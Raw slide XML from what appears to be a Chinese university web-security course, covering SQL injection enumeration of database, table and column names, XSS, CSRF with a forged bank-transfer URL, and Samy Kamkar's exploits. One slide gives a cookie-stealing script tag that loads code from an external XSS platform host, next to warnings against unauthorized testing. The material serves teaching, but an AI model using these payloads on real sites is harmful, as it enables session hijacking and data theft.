            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>b - BLOB（布尔值）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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https://zhuanlan.zhihu.com/p/139737334</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>b'g'g'g'g't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https://zhuanlan.zhihu.com/p/139737334</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>b'g'g'g'g't</a:t>
            </a:r>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SCHEMATA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中存储着所有库的名字，</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所以使用上述语句，可以查到所有的库名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056339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打个比方，我们去银行办理储蓄业务，第一次给你办了张银行卡，里面存放了身份证、密码、手机等个人信息。当你下次再来这个银行时，银行机器能识别你的卡，从而能够直接办理业务。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="850294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https://mp.weixin.qq.com/s/b2EsAy4liosUDoG-5m4NTg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、互联网搜索 XSS 找到跨站漏洞攻击平台</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>百度搜索 xss 关键词，翻了几页还真找到了一个在线平台：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、通过该平台获取攻击代码，插入相关网站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有了攻击平台之后，找一下新闻中的攻击代码，因为是要获取 cookie 信息，所以找获取 cookie 的功能即可，创建一个测试 cookie 的项目</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3、将攻击代码插入到存在 XSS 漏洞的网站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从新闻中的结果来看，获取到六十多条 cookie 信息，还包含了管理员的，猜出是存储型的 XSS 漏洞，也就是插入的代码保存到数据库，只要有人访问那个被插入恶意代码的页面即可出发恶意代码，从而被盗取 cookie。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有人会问，盗取 cookie 有啥用？有了 cookie，就可以登录你的账户，接管你的账户，你登录之后能做的操作，攻击者都可以做，包括花你的钱，修改你的资料等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我们也来试试，首先得找到存在 XSS 漏洞的网站，对于白帽子而言，找到漏洞，第一时间应该提交到相关平台，督促官方修复漏洞，而测试漏洞是否存在，无需使用攻击平台，只要能弹窗就行，弹窗脚本：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为了测试，我写了一个存在 xss 漏洞的测试页，内容如图：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图片</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将上面的弹窗代码带入参数，访问如图：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图片</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>到这里，就已经可以证明漏洞存在了，作为白帽子的测试已经结束，提交漏洞即可，无需进一步测试。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是新闻中的主人公，使用了攻击平台，插入了获取 cookie 的代码，我们试试插入攻击代码之后的效果：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&lt;sCRiPt sRC=//xss.yt/Nz9U&gt;&lt;/sCrIpT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在互联网上做测试，一定不能越界，无论是出于何种目的，获取用户敏感数据，攻击在线平台都是不允许的，都存在未授权测试的违法行为，如果是白帽子，测试漏洞一定要点到为止，不能进行深入利用，如果作为红队成员，一定在授权的范围内进行测试，锻炼技术就打靶场吧，千万不要未授权实战利用漏洞，来提升自己的能力，越界后，将追悔莫及。</a:t>
            </a:r>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XSS (Cross-Site Scripting)，跨站脚本攻击，因为缩写和 CSS重叠，所以只能叫 XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。</a:t>
            </a:r>
          </a:p>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利用虚假输入表单骗取用户个人信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用脚本窃取用户的Cookie值，被害者在不知情的情况下，帮助攻击者发送恶意请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示伪造的文章或图片。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>说到Web安全和XSS跨站脚本技术,几乎所有的书都会提到Samy Worm,这是在2005年感染了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mySpace社交网络上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>百万用户的蠕虫。正如Morris蠕虫是互联网第一个蠕虫, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>Samy Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>则是第一个XSS的蠕虫。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年，在刚刚结束的DEFCON上，Samy Kamkar的演讲议题“New Attacks and Tools to Wirelessly Steal Cars”（https://www.defcon.org/html/defcon-23/dc-23-speakers.html#Kamkar）引发了广泛关注，演讲中他展示了如何使用低成本无线黑客设备“偷”汽车，SamyKamkar自己开发了这款名为Rolljam的无线电设备，可以破坏汽车和车库门使用的无线遥控解锁码，截获密码进而可以随意打开汽车和车库的门锁。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Samy Kamkar称他已经在日产、凯迪拉克、福特、丰田、大众和克莱斯勒等品牌汽车以及Genie、Liftmaster车库门等产品上测试成功。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑客大咖Samy Kamkar光辉事迹</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这位Samy Kamkar是一位真正的黑客大咖，10年前他就曾成功利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AJAX蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击了当时最火的社交网站MySpace.com，2009年的Twitter蠕虫事件和2011年新浪微博蠕虫事件都沿袭了他当时的方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2005年10月，Samy Kamkar成为全球第一个AJAX蠕虫的作者，当时年仅19岁的Samy Kamkar发起了对MySpace.com的攻击，而他所利用的技术正是Web 2.0网站依赖的AJAX。通过利用MySpace.com中的漏洞，Samy Kamkar的蠕虫在几个小时内就在其作者的好友列表中加入了100万好友，并在每个人的自我简介后边加了一句话：“but most of all, Samy is my hero.”。Samy Kamkar因此遭遇了牢狱之灾，不过从此成为知名黑客，之后还他发现了多家主要信用卡的安全漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最近几年Samy Kamkar似乎转向了，喜欢开发一些“黑客”工具，破解一些流行的智能设备，而且喜欢将他的成功毫无不留的公开。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2013年Samy Kamkar开发了劫持无人机的“空中黑客”，用自己的程序改装了一架Parrot AR.Drone 2.0，它能够搜寻其它无人机的无线信号并控制它们，整个过程可以在飞行中完成，改装后的无人机叫SkyJack。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>SkyJack的软件基于Linux设计，它会依次运行几个支持程序，能够劫持空中的任何无人机。通过笔记本或平板向被劫持的无人机发出Javascript命令，可任意改变它们的路线、速度，甚至是查看现场视频。Samy Kamkar在其博客上贴出了SkyJack的完整教程和源代码，可感兴趣者免费下载。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2014年Samy Kamkar开发了一分钟内可入侵Mac的“USB项链”，这款名叫USBdriveby的项链基本上是一个USB微控制器，通过USB连接至电脑，然后利用USB接口所存在的安全漏洞，让电脑把自己当作是鼠标或键盘，使其可以发送命令来关闭监控应用的所有警告。它还能关闭OS X内置的防火墙，更改DNS设置，从而对电脑所有者所浏览的网页进行随意替换。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这款设备还能在完事之后自动进行清理，关掉可能开启的任意窗口或设置界面。而从插入电脑到攻击结束，整个过程只需30-60秒便可完成。Samy Kamkar同样在网站上用视频的方式对这个”USB项链”的原理和实现方式进行了完整公开。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2015年Samy Kamkar用3D打印了全自动解锁机器人，Samy Kamkar在网站上发布了这个3D打印部件+Arduino开发板制成的开锁机器人的3D打印设计图和软件代码，机器人名为Combo Breaker。</a:t>
            </a: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75951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 altLang="zh-CN" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>blog.csdn.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>/yy1715713348/article/details/131331710</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285764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XSS(跨站脚本攻击) - 常用代码大全</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://blog.csdn.net/chk218/article/details/81878479</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查询所有的表名，</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中定义了库名和其包含的表名，那么指定一个库名，查询这个库中所有表的名字</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个表中查找库“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”的所有表名</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302695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1、JS是一门前端语言。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、Ajax是一门技术，它提供了异步更新的机制，使用客户端与服务器间交换数据而非整个页面文档，实现页面的局部更新。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3、jQuery是一个框架，它对JS进行了封装，使其更方便使用。jQuery使得JS与Ajax的使用更方便</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3901637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https://blog.csdn.net/weixin_34294649/article/details/86337899</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>初步发现 Chrome 和 Safari 都没中招。IE、Firefox未能幸免。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://www.zhihu.com/question/19739025?__nids__=4129965#243413</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https://blog.csdn.net/weixin_34294649/article/details/86337899</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>初步发现 Chrome 和 Safari 都没中招。IE、Firefox未能幸免。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://www.zhihu.com/question/19739025?__nids__=4129965#243413</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https://mp.weixin.qq.com/s/fdPNziLNJGXZ_SOOhDLrqw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://www.freebuf.com/news/349237.html</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在网站页面中有许多页面的元素，当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象，接着生成各个子文档对象，每个页面元素对应一个文档对象，每个文档对象包含属性、方法和事件。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说，客户端的脚本程序可以通过DOM来动态修改页面内容，从客户端获取DOM中的数据并在本地执行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于这个特性，就可以利用JS脚本来实现XSS漏洞的利用。</a:t>
            </a:r>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CSRF是伪造客户端请求的一种攻击，CSRF的英文全称是Cross Site Request Forgery，字面上的意思是跨站点伪造请求。这种攻击方式是国外的安全人员于2000年提出，国内直到06年初才被关注，08年CSRF攻击方式开始在BLOG、SNS等大型社区类网站的脚本蠕虫中使用。</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CSRF攻击是攻击者利用用户的身份操作用户帐户的一种攻击方式，通常使用Anti CSRF Token来防御CSRF攻击，同时要注意Token的保密性和随机性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 受害者 Bob 在银行有一笔存款，通过对银行的网站发送请求 http://bank.example/withdraw?account=bob&amp;amount=1000000&amp;for=bob2 可以使 Bob 把 1000000 的存款转到 bob2 的账号下。通常情况下，该请求发送到网站后，服务器会先验证该请求是否来自一个合法的 session，并且该 session 的用户 Bob 已经成功登陆。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        黑客 Mallory 自己在该银行也有账户，他知道上文中的 URL 可以把钱进行转帐操作。Mallory 可以自己发送一个请求给银行：http://bank.example/withdraw?account=bob&amp;amount=1000000&amp;for=Mallory。但是这个请求来自 Mallory 而非 Bob，他不能通过安全认证，因此该请求不会起作用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        这时，Mallory 想到使用 CSRF 的攻击方式，他先自己做一个网站，在网站中放入如下代码： src=”http://bank.example/withdraw?account=bob&amp;amount=1000000&amp;for=Mallory ”，并且通过广告等诱使 Bob 来访问他的网站。当 Bob 访问该网站时，上述 url 就会从 Bob 的浏览器发向银行，而这个请求会附带 Bob 浏览器中的 cookie 一起发向银行服务器。大多数情况下，该请求会失败，因为他要求 Bob 的认证信息。但是，如果 Bob 当时恰巧刚访问他的银行后不久，他的浏览器与银行网站之间的 session 尚未过期，浏览器的 cookie 之中含有 Bob 的认证信息。这时，悲剧发生了，这个 url 请求就会得到响应，钱将从 Bob 的账号转移到 Mallory 的账号，而 Bob 当时毫不知情。等以后 Bob 发现账户钱少了，即使他去银行查询日志，他也只能发现确实有一个来自于他本人的合法请求转移了资金，没有任何被攻击的痕迹。而 Mallory 则可以拿到钱后逍遥法外。 </a:t>
            </a:r>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获取列名</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>COLUMN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中定义了库名和其所包含的列名</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>既要指定库名也要指定表名才可以查出某个表中的所有列</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询出表</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中一共有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个列的名字</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9672386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Web安全-一句话木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://blog.csdn.net/weixin_39190897/article/details/86772765</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https://netsecurity.51cto.com/art/202004/614248.htm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登陆的动作实际上是通过预设好的语句（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里传过来的参数，组成一个完整的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的语句在数据库链接中去执行。</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782746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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中数据表中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句中，形成完成的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</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7900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能够修改的地方：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：输入框</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数的位置</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15087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5929161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1722755" y="0"/>
            <a:ext cx="10469245" cy="61125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 name="直接连接符 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871508" y="582444"/>
            <a:ext cx="0" cy="505609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mailto:chenlili@hdu.edu.cn" TargetMode="Externa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www.text.com/text.php?id=3" TargetMode="Externa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text.com/text.php?id=3" TargetMode="Externa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text.com/text.php?id=3"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customXml" Target="../ink/ink4.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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jpe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s://so.csdn.net/so/search?from=pc_blog_highlight&amp;q=linux" TargetMode="External"/><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629643" y="304780"/>
            <a:ext cx="2038123" cy="1999192"/>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glow rad="63500">
              <a:schemeClr val="accent1">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="149987" dist="250190" dir="8460000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="28000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="50000" endA="295" endPos="92000" dist="101600" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="obliqueBottomLeft"/>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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503712" y="3203199"/>
            <a:ext cx="5184576" cy="1668145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3735" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
